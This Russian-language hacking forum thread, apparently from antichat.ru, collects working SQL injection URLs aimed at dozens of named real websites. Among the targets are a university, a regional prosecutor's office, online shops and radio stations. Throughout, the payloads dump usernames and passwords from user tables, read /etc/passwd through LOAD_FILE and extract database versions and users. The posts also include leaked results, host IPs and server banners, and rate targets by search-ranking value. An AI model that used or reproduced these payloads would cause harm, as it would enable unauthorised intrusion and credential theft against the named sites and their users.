SQL Инъекции

http://www.stevens.edu/provost/news/single_news.php?news_events_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(user_name,char(58),user_password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83+from+cop.cpg14x_users

просто другая база ))

 

http://www.keglia.ru/raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_password),2,3+from+phpbb_users+limit+1,1+--+


боян/raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_password),2,3+from+phpbb_users+limit+1,1+--+


http://azbyka.ru/znakomstva/index.php?module=community&file=user&id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,email,password,login),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+pravmamba_users+limit+0,1

 

http://www.ivanivanich.ru/disc.php?id=-49+union+select+1,user%28%29,3,4,5,6,7,8,9,0%20--
ТИЦ-20
PR-1

http://www.mahaliajackson.us/discography/disc.php?id=-141+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 --
PR-2

http://assassinatecaesar.com/disc.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--

http://joansanmarti.com/disc.php?id=-29+union+select+1,2,3,4,5,6,7,8%20--

 

ПРИМОРСК судоремонтное предприятие

http://www.primorck.ru/index.php?sublist=-1+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10+--

version : 5.0.91-community
user : primorck_goga@localhost
database : primorck_db
os : unknown-linux-gnu

 

Прокуратура Чукотского автономного округа

http://prokuror.chukotnet.ru/index.php?section=4&action=view&id=-623+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12&module=newsmodule&src=%40random45eb8fba06bd1


5.0.77rokurorrokuror@localhost:redhat-linux-gnu

 

arcsoft.com

Code:

http://www.arcsoft.com/press/viewrelease.asp?releaseid=189-999.9+union+select+1,database(),user(),4,5,6,7,8,9,10,version(),12,13--

PR 6
тиц 200

 

http://news.franchiseindia.com/print_news.php?id=-2-213+union+select+1,2,1,1,2,3,4,5,1,7,8,9,0 --
ТИЦ-10
PR-5

http://www.utu.org/print_news.cfm?ArticleID=-51312+union+select+1,2 --
ТИЦ-10
PR-6
[Microsoft][ODBC Microsoft Access Driver]

http://www.thenewghanaian.com/print_news.asp?id=-801+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES%29--
PR-1

http://www.1c.lutsk.ua/print_news.php?id=-201+union+select+1,2,3,4,version%28%29,6%20--
ТИЦ-1300
PR-2

http://www.fbcwc.ca/print_news.php?id=-20+union+select+1,2,3,4%20--
PR-5

http://www.clarkrealtycapital.com/print_news.asp?id=-21767441+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 --
PR-4
[Microsoft][ODBC SQL Server Driver]

http://www.ghanaonthenet.com/print_news.asp?id=1+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES%29--
PR-2
[Microsoft][ODBC Microsoft Access Driver]

http://www.icdl.org.za/print_pages.php?id=-7+union+select+1,2,3,4,5,6 --
PR-1

 

CARC

http://www.carc.jo/pages_en.php?type=page&id=-3279+union+select+version()

PR-7

---

http://www.nooralhusseinfoundation.org/index.php?pager=end&task=view&type=content&pageid=-76+union+select+1,2,concat(username,char(58),password),4,5,6,7+from+users--

PR-5

 

shops

Code:

http://www.ealandmania.net/catalogs/buy.php?c=1%27&p=4&o=79 AND %True_Expression% AND 'x'='x

Host IP: 208.76.82.37
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
DB Server: MySQL
Current DB: T,# WQQS #C#,28Tx>f?}{Wryvp?~f???q?Y?o#50M??Bo?@xMF4??lT_c

Code:

http://www.mnsnowmobiler.org/index.php?pageid=92 AND %True_Expression%

Host IP: 198.31.50.252
Web Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.11 mod_ssl/2.8.31 OpenSSL/0.9.8i
Powered-by: PHP/5.2.11
DB Server: MySQL

Code:

http://www.ikancorp.com/productInfo.php?id=188%27 AND %True_Expression%

Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL

Code:

[B][COLOR=Red][SIZE=3]Боян![/SIZE][/COLOR][/B]

Host IP: 74.52.164.178
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: bugnbots_bugnbots

Code:

http://chinashoppingzone.com/productinfo.php?id=238%27 AND %True_Expression%

Host IP: 195.191.102.128
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL

Code:

[B][COLOR=Red][SIZE=3]Боян![/SIZE][/COLOR][/B]

Host IP: 85.17.199.6
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: flashin_sparkms

Code:

http://shoppingtang.com/productinfo.php?id=186%27 AND %True_Expression%

Host IP: 173.201.111.157
Web Server: Apache
DB Server: MySQL

Code:

http://www.g20trade.com/productinfo.php?id=500%27 AND %True_Expression%

Host IP: 173.201.1.154
Web Server: Apache
DB Server: MySQL

Code:

http://www.chinashopunion.com/productinfo.php?id=103%27 AND %True_Expression%

Host IP: 97.74.137.145
Web Server: Apache
DB Server: MySQL

Code:

http://www.shopcarnival.com/productinfo.php?id=367%27 AND %True_Expression%

Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL

Code:

http://storecarnival.com/productinfo.php?id=365%27 AND %True_Expression%

Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL

Code:

http://www.sghgate.com/productinfo.php?id=606%27 AND %True_Expression%

Host IP: 195.191.102.57
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL

Code:

http://www.thegenealogist.co.uk/nameindex/productinfo.php?id=24%27 AND %True_Expression%

Host IP: 195.224.80.57
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL

Code:

http://www.shopzooly.com/productinfo.php?id=751%27 AND %True_Expression%

Host IP: 173.201.150.242
Web Server: Apache
DB Server: MySQL

Code:

http://shelleysigns.co.uk/public_html/productinfo.php?id=204%27&KeepThis=true&TB_iframe=true&height=532&width=675 AND %True_Expression%

Host IP: 212.38.84.178
Web Server: Apache
DB Server: MySQL

Code:

[B][COLOR=Red][SIZE=3]Боян![/SIZE][/COLOR][/B]

Host IP: 198.66.255.130
Web Server: Apache/2.2.15 (Unix) PHP/5.2.9 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/0.9.8m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.9
DB Server: MySQL unknown ver
Current DB: atmweb

Code:

http://luckinthebox3.com/productinfo.php?id=209%27 AND %True_Expression%

Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL

Code:

http://www.wishesg20.com/productinfo.php?id=429%27 AND %True_Expression%

Host IP: 173.201.0.93
Web Server: Apache
DB Server: MySQL

Code:

http://www.zoolystore.com/productinfo.php?id=1287%27 AND %True_Expression% 

Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL

Code:

[COLOR=Red][B][SIZE=3]Боян![/SIZE][/B][/COLOR]

Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL

Code:

http://www.hellozooly.com/productinfo.php?id=437%27 AND %True_Expression%

Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL

Code:

http://rental.microsearch.com/productInfo.php?id=114%27 AND %True_Expression%

Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL

Code:

http://www.zoolystyle.com/productinfo.php?id=222%27 AND %True_Expression%

Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL

+++

--------
Konqi : постиш скули которые постил раньше???

https://forum.antichat.ru/showthread.php?p=2133841
я как бы предупреждал тебе уже

 

Error-based blind SQLi

кто-нить знает как тут выводить строки из таблиц? что-то я крутил-крутил и ничего =\

 

"Русское Радио", "Радио Шансон"-Астрахань

http://www.astrakhanfm.ru/news/news.php?id=-23047+and+1=2+union+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7--&&rid=17

version : 4.1.22-lk-log
user : astrakhanru@localhost
database : astrakhanru
os : pc-linux-gnu

 

http://snews.awddesign.co.uk/snews/index.php?category=-3%20union%20select%200,version(),2,3,4,5,6,7,8

version: 4.1.22
user: [email protected]

 

http://www.webagro.net/printnews.php?id=92952+union+select+1,2,3,4,5,6,7,8%20--
ТИЦ-150
PR-4

 

Code:

http://lxn.ru/index.php?id=870'%20union%20select%201,2,3,4,5

ТИЦ 30
PR 3

 

http://www.ghra.org/events.php?eventid=45+and+1=0+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

 

какой-то сайт китайский.с бегаюшими ментами
http://www.zszx.org/page.php?Id=-5661union+select+1,%20version(),3,4+--+
http://www.eco-schools.org/page.php?id=18+union+select+1,2,3,4,5+--+

 

Code:

http://www.tea-home.ru/userfiles/file/page.php?id=46'%20union%20select%201,2,3,4,5%20--

ТИЦ 0
PR 1

Code:

http://www.begopayrollservices.nl/detachering/cv-bank.php?ID=-13+union+select+1,2,3,4,5,6,7,8%20--

Code:

http://www.business-consultant.ru/page.php?id=262%20union%20select%201,2,3,4,5%20--

ТИЦ 0
PR 1

Code:

http://www.magnitogorsk.org/org/page.php?id=33'%20union%20select%201,2,3,4,5%20--

ТИЦ 20
PR 0

Code:

http://www.tehcomsnab.ru/page.php?id=54%20union%20select%201,2,3,4,5%20--

Code:

http://www.trimax.ru/page.php?id=139%20union%20select%201,2,3,4,5%20--

ТИЦ 10
PR 1

Code:

http://www.vip-poet.ru/page.php?id=7%20union%20select%201,2,3,4,5%20--

ТИЦ 20
PR 2

 

http://anavar.ru/articls/?id=100+union+select+1,2,3,4,5,6,7+--+
тиц 150
пр 3

Боян (https://forum.antichat.ru/showpost.php?p=2210269&postcount=12411)


18+
http://7-ru.net/view_video.php?id=-56+union+select+1,2,3,4,5,6,7,8+--+

 

http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt(aes_encrypt(LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100)),1),1),21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user--

http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt(aes_encrypt(concat(user,char(58),password),1),1),21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user--

 

zoccolo.ru - в строчке поиска на главной вводим

Code:

')union/**/select/**/1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os)#

результат запроса в конце страницы

Version: 5.0.26-lk-log
User: zoccolor@localhost
Database: zoccolor
Os: pc-linux-gnu

тИЦ — 190
PR — 5

если кто-нибудь знает, как докрутить подобного рода sql-inj, буду рад видеть ответ в пм...

Code:

http://www.nytc.org/dbacceptance.cfm?ID=-1+union+select+null,null,null,null,null,null,null,null,null,null,123,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+races%00

ACCESS 2000

тИЦ — 10
PR — 4

Code:

http://www.club-perexod.ru/penews.php?id=-1+union+select+1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4,5,6,7,8--+

Version: 5.0.26-log
User: clubperexo@localhost
Database: clubperexo
Os: pc-linux-gnu

тИЦ — 20